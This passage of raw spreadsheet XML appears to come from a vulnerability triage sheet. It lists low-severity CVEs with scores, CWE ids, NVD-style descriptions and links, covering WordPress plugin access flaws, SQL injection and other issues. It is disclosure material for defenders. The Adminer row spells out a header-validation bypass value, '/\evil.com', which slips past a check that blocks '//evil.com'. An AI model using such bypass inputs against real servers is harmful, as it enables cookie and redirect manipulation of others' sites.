r="R2312" s="5" t="inlineStr"><is><t>The JCH Optimize WordPress plugin before 5.0.1 does not properly restrict a directory path provided to one of its administrative image-browsing features to within the site, allowing high-privilege users, administrators on single-site and sub-site administrators on multisite, to enumerate directories and file names outside the web root.</t></is></c><c r="S2312" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-15693</t></is></c></row><row r="2313"><c r="A2313" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2313" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2313" s="5" t="inlineStr"><is><t>CVE-2026-78150</t></is></c><c r="D2313" s="5" t="n"><v>2.7</v></c><c r="E2313" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2313" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2313" s="5" t="inlineStr" /><c r="H2313" s="5" t="n"><v>0.002</v></c><c r="I2313" s="5" t="inlineStr" /><c r="J2313" s="5" t="inlineStr" /><c r="K2313" s="5" t="inlineStr" /><c r="L2313" s="5" t="inlineStr" /><c r="M2313" s="5" t="inlineStr" /><c r="N2313" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2313" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2313" s="5" t="inlineStr" /><c r="Q2313" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R2313" s="5" t="inlineStr"><is><t>The Smart Post  WordPress plugin before 4.0.8 does not check the type, ownership or status of the post it is asked to duplicate, allowing users with contributor privileges and above to copy any private or password protected post into a draft of their own and read its content and metadata.</t></is></c><c r="S2313" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78150</t></is></c></row><row r="2314"><c r="A2314" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2314" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2314" s="5" t="inlineStr"><is><t>CVE-2026-84392</t></is></c><c r="D2314" s="5" t="n"><v>2.7</v></c><c r="E2314" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2314" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G2314" s="5" t="inlineStr" /><c r="H2314" s="5" t="n"><v>0.003</v></c><c r="I2314" s="5" t="inlineStr" /><c r="J2314" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K2314" s="5" t="inlineStr" /><c r="L2314" s="5" t="inlineStr" /><c r="M2314" s="5" t="inlineStr" /><c r="N2314" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2314" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2314" s="5" t="inlineStr" /><c r="Q2314" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="R2314" s="5" t="inlineStr"><is><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is></c><c r="S2314" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84392</t></is></c></row><row r="2315"><c r="A2315" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2315" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2315" s="5" t="inlineStr"><is><t>CVE-2026-84745</t></is></c><c r="D2315" s="5" t="n"><v>2.7</v></c><c r="E2315" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2315" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2315" s="5" t="inlineStr" /><c r="H2315" s="5" t="n"><v>0.002</v></c><c r="I2315" s="5" t="inlineStr" /><c r="J2315" s="5" t="inlineStr" /><c r="K2315" s="5" t="inlineStr" /><c r="L2315" s="5" t="inlineStr" /><c r="M2315" s="5" t="inlineStr" /><c r="N2315" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2315" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2315" s="5" t="inlineStr" /><c r="Q2315" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="R2315" s="5" t="inlineStr"><is><t>The Events Calendar WordPress plugin before 6.17.3.1 does not restrict non-public content to the users entitled to read it on its public REST archives, allowing users with a low-privilege role such as contributor to read the full contents of every unpublished record on the site, including other users'.</t></is></c><c r="S2315" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84745</t></is></c></row><row r="2316"><c r="A2316" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2316" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2316" s="5" t="inlineStr"><is><t>CVE-2026-84926</t></is></c><c r="D2316" s="5" t="n"><v>2.7</v></c><c r="E2316" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2316" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2316" s="5" t="inlineStr" /><c r="H2316" s="5" t="n"><v>0.002</v></c><c r="I2316" s="5" t="inlineStr" /><c r="J2316" s="5" t="inlineStr" /><c r="K2316" s="5" t="inlineStr" /><c r="L2316" s="5" t="inlineStr" /><c r="M2316" s="5" t="inlineStr" /><c r="N2316" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2316" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2316" s="5" t="inlineStr" /><c r="Q2316" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="R2316" s="5" t="inlineStr"><is><t>The EmbedPress  WordPress plugin before 4.6.4 does not correctly restrict access to one of its Google Reviews REST routes to administrators, allowing any authenticated user with contributor-level access or above to read the site administrator's email address, a value WordPress core withholds from that role.</t></is></c><c r="S2316" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84926</t></is></c></row><row r="2317"><c r="A2317" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2317" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2317" s="5" t="inlineStr"><is><t>CVE-2026-84927</t></is></c><c r="D2317" s="5" t="n"><v>2.7</v></c><c r="E2317" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2317" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2317" s="5" t="inlineStr" /><c r="H2317" s="5" t="n"><v>0.002</v></c><c r="I2317" s="5" t="inlineStr" /><c r="J2317" s="5" t="inlineStr" /><c r="K2317" s="5" t="inlineStr" /><c r="L2317" s="5" t="inlineStr" /><c r="M2317" s="5" t="inlineStr" /><c r="N2317" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2317" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2317" s="5" t="inlineStr" /><c r="Q2317" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2317" s="5" t="inlineStr"><is><t>The EmbedPress  WordPress plugin before 4.6.4 does not perform a sufficient authorization check on one of its Google Reviews REST API routes, allowing users with the Contributor role and above to modify a site-wide store, deleting entries an administrator configured and injecting their own, which are rendered publicly across the site.</t></is></c><c r="S2317" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84927</t></is></c></row><row r="2318"><c r="A2318" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2318" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2318" s="5" t="inlineStr"><is><t>CVE-2026-18743</t></is></c><c r="D2318" s="5" t="n"><v>2.5</v></c><c r="E2318" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2318" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G2318" s="5" t="inlineStr" /><c r="H2318" s="5" t="n"><v>0.001</v></c><c r="I2318" s="5" t="inlineStr" /><c r="J2318" s="5" t="inlineStr" /><c r="K2318" s="5" t="inlineStr" /><c r="L2318" s="5" t="inlineStr" /><c r="M2318" s="5" t="inlineStr" /><c r="N2318" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2318" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P2318" s="5" t="inlineStr" /><c r="Q2318" s="5" t="inlineStr"><is><t>CWE-131</t></is></c><c r="R2318" s="5" t="inlineStr"><is><t>A flaw was found in popt. This vulnerability allows an attacker to provide specially crafted configuration content to a host, which, when loaded, can lead to a small memory corruption issue. This occurs because of an error in how the `poptConfigFileToString` function reallocates memory for buffers. Successful exploitation could result in heap metadata corruption, potentially causing the affected process to become unavailable (denial of service).</t></is></c><c r="S2318" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18743</t></is></c></row><row r="2319"><c r="A2319" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2319" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2319" s="5" t="inlineStr"><is><t>CVE-2026-45197</t></is></c><c r="D2319" s="5" t="n"><v>2.5</v></c><c r="E2319" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2319" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2319" s="5" t="inlineStr" /><c r="H2319" s="5" t="n"><v>0.001</v></c><c r="I2319" s="5" t="inlineStr" /><c r="J2319" s="5" t="inlineStr" /><c r="K2319" s="5" t="inlineStr" /><c r="L2319" s="5" t="inlineStr" /><c r="M2319" s="5" t="inlineStr" /><c r="N2319" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2319" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2319" s="5" t="inlineStr" /><c r="Q2319" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="R2319" s="5" t="inlineStr"><is><t>Kernel software installed and running inside a Guest VM may post improper commands to the GPU Firmware to trigger a read and/or write data outside the Guest's virtualised GPU memory.



The firmware uses data provided by the Guest VM to set up accesses to memory. It validated this before use, but a TOCTOU bug was present which allowed the earlier check results to be invalidated.</t></is></c><c r="S2319" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45197</t></is></c></row><row r="2320"><c r="A2320" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2320" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2320" s="5" t="inlineStr"><is><t>CVE-2026-16434</t></is></c><c r="D2320" s="5" t="n"><v>2.3</v></c><c r="E2320" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2320" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2320" s="5" t="inlineStr" /><c r="H2320" s="5" t="n"><v>0.003</v></c><c r="I2320" s="5" t="inlineStr" /><c r="J2320" s="5" t="inlineStr" /><c r="K2320" s="5" t="inlineStr" /><c r="L2320" s="5" t="inlineStr" /><c r="M2320" s="5" t="inlineStr" /><c r="N2320" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2320" s="5" t="inlineStr"><is><t>2026-08-25</t></is></c><c r="P2320" s="5" t="inlineStr" /><c r="Q2320" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="R2320" s="5" t="inlineStr"><is><t>Adminer 4.6.0 through 5.5.0 (fixed in 5.5.1) contains an incomplete fix for a prior X-Forwarded-Prefix vulnerability (GHSA-8478-xrj3-h9c2). The validation guard (bootstrap.inc.php) only rejects prefixes matching ^/[^/], blocking //evil.com but allowing values such as /\evil.com whose second character is a backslash. Because browsers normalize backslash to forward slash, a network-path reference survives into REQUEST_URI and reaches cookie_path(), affecting the Set-Cookie Path attribute. Exploitation requires that clients can set the X-Forwarded-Prefix header (a misconfigured or absent reverse proxy). Impact is limited to anomalous cookie-path scoping.</t></is></c><c r="S2320" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16434</t></is></c></row><row r="2321"><c r="A2321" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2321" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2321" s="5" t="inlineStr"><is><t>CVE-2026-73087</t></is></c><c r="D2321" s="5" t="n"><v>2.3</v></c><c r="E2321" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2321" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G2321" s="5" t="inlineStr" /><c r="H2321" s="5" t="n"><v>0.003</v></c><c r="I2321" s="5" t="inlineStr" /><c r="J2321" s="5" t="inlineStr" /><c r="K2321" s="5" t="inlineStr" /><c r="L2321" s="5" t="inlineStr"><is><t>go:github.com/amir20/dozzle</t></is></c><c r="M2321" s="5" t="inlineStr"><is><t>1.29.1-0.20260804193351-8cf7ccd5ee04</t></is></c><c r="N2321" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2321" s="5" t="inlineStr" /><c r="P2321" s="5" t="inlineStr" /><c r="Q2321" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R2321"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S2321" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73087</t></is></c></row><row r="2322"><c r="A2322" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2322" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2322" s="5" t="inlineStr"><is><t>CVE-2026-82060</t></is></c><c r="D2322" s="5" t="n"><v>2.3</v></c><c r="E2322" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2322" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G2322" s="5" t="inlineStr" /><c r="H2322" s="5" t="n"><v>0.002</v></c><c r="I2322" s="5" t="inlineStr" /><c r="J2322" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K2322" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L2322" s="5" t="inlineStr" /><c r="M2322" s="5" t="inlineStr" /><c r="N2322" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2322" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2322" s="5" t="inlineStr" /><c r="Q2322" s="5" t="inlineStr"><is><t>CWE-943</t></is></c><c r="R2322" s="5" t="inlineStr"><is><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is></c><c r="S2322" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82060</t></is></c></row><row r="2323"><c r="A2323" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2323" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2323" s="5" t="inlineStr"><is><t>CVE-2026-82710</t></is></c><c r="D2323" s="5" t="n"><v>2.3</v></c><c r="E2323" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2323" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G2323" s="5" t="inlineStr" /><c r="H2323" s="5" t="n"><v>0.004</v></c><c r="I2323" s="5" t="inlineStr" /><c r="J2323" s="5" t="inlineStr" /><c r="K2323" s="5" t="inlineStr" /><c r="L2323" s="5" t="inlineStr" /><c r="M2323" s="5" t="inlineStr" /><c r="N2323" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2323" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2323" s="5" t="inlineStr" /><c r="Q2323" s="5" t="inlineStr"><is><t>CWE-150</t></is></c><c r="R2323" s="5" t="inlineStr"><is><t>Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in ash-project usage_rules allows a malicious package publisher to inject terminal control sequences into the output of mix usage_rules.search_docs.

mix usage_rules.search_docs searches Hex documentation through search.hexdocs.pm, which indexes the documentation of every published package, and prints the matching results (title, package, type, doc reference, and highlighted snippets) to the terminal. The formatter in Mix.Tasks.UsageRules.SearchDocs interpolated those publisher-controlled fields verbatim, neutralizing no terminal control characters; the only transform it applied adds escape sequences rather than removing them. A malicious package can embed ANSI terminal escape sequences (cursor movement, line erase, carriage returns, OSC 52 clipboard writes) in its indexed documentation, so when a developer runs a search that surfaces those docs the sequences reach the terminal unchanged — forging the displayed hexdocs URL or a suggested command, hiding text, or writing to the clipboard. No authentication or privileged position is required; only publishing a package.

This issue affects usage_rules: from 0.1.18 before 1.2.8.</t></is></c><c r="S2323" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82710</t></is></c></row><row r="2324"><c r="A2324" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2324" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2324" s="5" t="inlineStr"><is><t>CVE-2026-58234</t></is></c><c r="D2324" s="5" t="n"><v>2.2</v></c><c r="E2324" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2324" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G2324" s="5" t="inlineStr" /><c r="H2324" s="5" t="n"><v>0.002</v></c><c r="I2324" s="5" t="inlineStr" /><c r="J2324" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K2324" s="5" t="inlineStr" /><c r="L2324" s="5" t="inlineStr" /><c r="M2324" s="5" t="inlineStr" /><c r="N2324" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2324" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2324" s="5" t="inlineStr" /><c r="Q2324" s="5" t="inlineStr"><is><t>CWE-776</t></is></c><c r="R2324" s="5" t="inlineStr"><is><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is></c><c r="S2324" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58234</t></is></c></row><row r="2325"><c r="A2325" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2325" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2325" s="5" t="inlineStr"><is><t>CVE-2026-84225</t></is></c><c r="D2325" s="5" t="n"><v>2.2</v></c><c r="E2325" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2325" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2325" s="5" t="inlineStr" /><c r="H2325" s="5" t="n"><v>0.001</v></c><c r="I2325" s="5" t="inlineStr" /><c r="J2325" s="5" t="inlineStr" /><c r="K2325" s="5" t="inlineStr" /><c r="L2325" s="5" t="inlineStr" /><c r="M2325" s="5" t="inlineStr" /><c r="N2325" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2325" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2325" s="5" t="inlineStr" /><c r="Q2325" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R2325" s="5" t="inlineStr"><is><t>The Kirki  WordPress plugin before 6.3.0 does not check that a user is allowed to act on a collaboration comment before changing its state, allowing users whom an administrator has granted content-level access to the page builder to modify comments left by other users, including on pages they cannot themselves open.</t></is></c><c r="S2325" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84225</t></is></c></row><row r="2326"><c r="A2326" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2326" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2326" s="5" t="inlineStr"><is><t>CVE-2026-85458</t></is></c><c r="D2326" s="5" t="n"><v>2.1</v></c><c r="E2326" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2326" s="5" t="inlineStr"><is><t>xpdf@xpdfreader.com</t></is></c><c r="G2326" s="5" t="inlineStr" /><c r="H2326" s="5" t="n"><v>0.001</v></c><c r="I2326" s="5" t="inlineStr" /><c r="J2326" s="5" t="inlineStr" /><c r="K2326" s="5" t="inlineStr" /><c r="L2326" s="5" t="inlineStr" /><c r="M2326" s="5" t="inlineStr" /><c r="N2326" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2326" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P2326" s="5" t="inlineStr" /><c r="Q2326" s="5" t="inlineStr"><is><t>CWE-369</t></is></c><c r="R2326" s="5" t="inlineStr"><is><t>Divide-by-zero in Xpdf 4.06 (and earlier), when a glyph in a Type 3 font has a zero height.</t></is></c><c r="S2326" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85458</t></is></c></row><row r="2327"><c r="A2327" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2327" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2327" s="5" t="inlineStr"><is><t>CVE-2026-85513</t></is></c><c r="D2327" s="5" t="n"><v>2.1</v></c><c r="E2327" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2327" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2327" s="5" t="inlineStr" /><c r="H2327" s="5" t="n"><v>0.002</v></c><c r="I2327" s="5" t="inlineStr" /><c r="J2327" s="5" t="inlineStr" /><c r="K2327" s="5" t="inlineStr" /><c r="L2327" s="5" t="inlineStr" /><c r="M2327" s="5" t="inlineStr" /><c r="N2327" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2327" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2327" s="5" t="inlineStr" /><c r="Q2327" s="5" t="inlineStr"><is><t>CWE-266, CWE-269</t></is></c><c r="R2327" s="5" t="inlineStr"><is><t>A weakness has been identified in StackStorm st2 up to 3.9.0. This issue affects the function assert_user_is_admin_if_user_query_param_is_provided of the file st2api/st2api/controllers/v1/actionexecutions.py of the component NoOp RBAC backend. This manipulation of the argument User causes improper privilege management. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. Prior advisory CVE-2022-44009 was reported as a follow-up on the same sink, but this issue is distinct: it needs no Jinja RBAC und affects default install with RBAC disabled. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="S2327" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85513</t></is></c></row><row r="2328"><c r="A2328" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2328" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2328" s="5" t="inlineStr"><is><t>CVE-2026-86163</t></is></c><c r="D2328" s="5" t="n"><v>2.1</v></c><c r="E2328" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2328" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2328" s="5" t="inlineStr" /><c r="H2328" s="5" t="n"><v>0.002</v></c><c r="I2328" s="5" t="inlineStr" /><c r="J2328" s="5" t="inlineStr" /><c r="K2328" s="5" t="inlineStr" /><c r="L2328" s="5" t="inlineStr" /><c r="M2328" s="5" t="inlineStr" /><c r="N2328" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2328" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P2328" s="5" t="inlineStr" /><c r="Q2328" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R2328" s="5" t="inlineStr"><is><t>A vulnerability was identified in itsourcecode Sales and Inventory System 1.0. This impacts an unknown function of the file /pages/pro_del.php. The manipulation of the argument ID leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used.</t></is></c><c r="S2328" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86163</t></is></c></row><row r="2329"><c r="A2329" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2329" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2329" s="5" t="inlineStr"><is><t>CVE-2026-86164</t></is></c><c r="D2329" s="5" t="n"><v>2.1</v></c><c r="E2329" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2329" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2329" s="5" t="inlineStr" /><c r="H2329" s="5" t="n"><v>0.002</v></c><c r="I2329" s="5" t="inlineStr" /><c r="J2329" s="5" t="inlineStr" /><c r="K2329" s="5" t="inlineStr" /><c r="L2329" s="5" t="inlineStr" /><c r="M2329" s="5" t="inlineStr" /><c r="N2329" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2329" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P2329" s="5" t="inlineStr" /><c r="Q2329" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R2329" s="5" t="inlineStr"><is><t>A security flaw has been discovered in itsourcecode Sales and Inventory System 1.0. Affected is an unknown function of the file /pages/trans_view.php. The manipulation of the argument ID results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks.</t></is></c><c r="S2329" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86164</t></is></c></row><row r="2330"><c r="A2330" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2330" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2330" s="5" t="inlineStr"><is><t>CVE-2026-86171</t></is></c><c r="D2330" s="5" t="n"><v>2.1</v></c><c r="E2330" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2330" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2330" s="5" t="inlineStr" /><c r="H2330" s="5" t="n"><v>0.002</v></c><c r="I2330" s="5" t="inlineStr" /><c r="J2330" s="5" t="inlineStr" /><c r="K2330" s="5" t="inlineStr" /><c r="L2330" s="5" t="inlineStr" /><c r="M2330" s="5" t="inlineStr" /><c r="N2330" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2330" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P2330" s="5" t="inlineStr" /><c r="Q2330" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R2330" s="5" t="inlineStr"><is><t>A security vulnerability has been detected in DefaultFuction CRM 1.0.0. This affects an unknown function of the file /modules/orders/delete.php. Such manipulation of the argument ID leads to sql injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used.</t></is></c><c r="S2330" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86171</t></is></c></row><row r="2331"><c r="A2331" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2331" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2331" s="5" t="inlineStr"><is><t>CVE-2026-86182</t></is></c><c r="D2331" s="5" t="n"><v>2.1</v></c><c r="E2331" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2331" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2331" s="5" t="inlineStr" /><c r="H2331" s="5" t="n"><v>0.002</v></c><c r="I2331" s="5" t="inlineStr" /><c r="J2331" s="5" t="inlineStr" /><c r="K2331" s="5" t="inlineStr" /><c r="L2331" s="5" t="inlineStr" /><c r="M2331" s="5" t="inlineStr" /><c r="N2331" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2331" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P2331" s="5" t="inlineStr" /><c r="Q2331" s="5" t="inlineStr"><is><t>CWE-352, CWE-862</t></is></c><c r="R2331" s="5" t="inlineStr"><is><t>A vulnerability was determined in diem-project diem up to 5.1.3. This affects the function executeCommand of the file dmAdminPlugin/modules/dmConsole/actions/actions.class.php of the component dmConsole. This manipulation of the argument dm_command causes cross-site request forgery. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="S2331" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86182</t></is></c></row><row r="2332"><c r="A2332" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2332" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2332" s="5" t="inlineStr"><is><t>CVE-2026-86216</t></is></c><c r="D2332" s="5" t="n"><v>2.1</v></c><c r="E2332" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2332" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2332" s="5" t="inlineStr" /><c r="H2332" s="5" t="n"><v>0.003</v></c><c r="I2332" s="5" t="inlineStr" /><c r="J2332" s="5" t="inlineStr" /><c r="K2332" s="5" t="inlineStr" /><c r="L2332" s="5" t="inlineStr" /><c r="M2332" s="5" t="inlineStr" /><c r="N2332" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2332" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P2332" s="5" t="inlineStr" /><c r="Q2332" s="5" t="inlineStr"><is><t>CWE-79, CWE-94</t></is></c><c r="R2332" s="5" t="inlineStr"><is><t>A security vulnerability has been detected in code-projects Hotel and Tourism Reservation in PHP 1.0. This impacts an unknown function of the file /ht/details.php. The manipulation of the argument room leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used.</t></is></c><c r="S2332" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86216</t></is></c></row><row r="2333"><c r="A2333" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2333" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2333" s="5" t="inlineStr"><is><t>CVE-2026-86228</t></is></c><c r="D2333" s="5" t="n"><v>2.1</v></c><c r="E2333" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2333" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2333" s="5" t="inlineStr" /><c r="H2333" s="5" t="n"><v>0.002</v></c><c r="I2333" s="5" t="inlineStr" /><c r="J2333" s="5" t="inlineStr" /><c r="K2333" s="5" t="inlineStr" /><c r="L2333" s="5" t="inlineStr" /><c r="M2333" s="5" t="inlineStr" /><c r="N2333" s="5" 